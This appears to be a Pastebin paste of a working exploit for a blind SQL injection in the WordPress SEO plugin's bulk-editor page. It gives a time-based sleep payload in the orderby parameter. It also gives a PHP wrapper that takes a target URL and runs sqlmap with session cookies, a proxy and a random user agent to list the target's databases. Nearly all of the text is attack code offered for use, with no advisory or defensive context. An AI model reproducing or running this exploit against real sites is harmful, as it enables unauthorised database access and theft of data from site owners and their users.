Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. [+] SQL vulnerability in WordPress SEO - Blind SQL
  2.  
  3. $target = "_TARGET_";
  4. $exploit = "/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc";
  5.  
  6.  
  7. [+]  Using SQLMap:
  8.  
  9. <?php
  10. set_time_limit(0);
  11. echo "[+]  MINI exploit-SQLMAP / SQL vulnerability in WordPress SEO - Blind SQL\n";
  12. $target = isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}")  : exit("\n0x[ERRO] DEFINE TARGET!\n");
  13. $command = "python ../sqlmap/sqlmap.py -u '{$target}/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date*&order=asc' --batch --dbms=MySQL --cookie='wordpress_9d...; wordpress_logged_in_9dee67...;' --proxy 'http://localhost:8118' --random-agent --level 2 --risk 1 --technique=B --eta --answers='follow=N' --dbs";
  14. system($command, $dados).empty($dados[0]) ? exit() : NULL;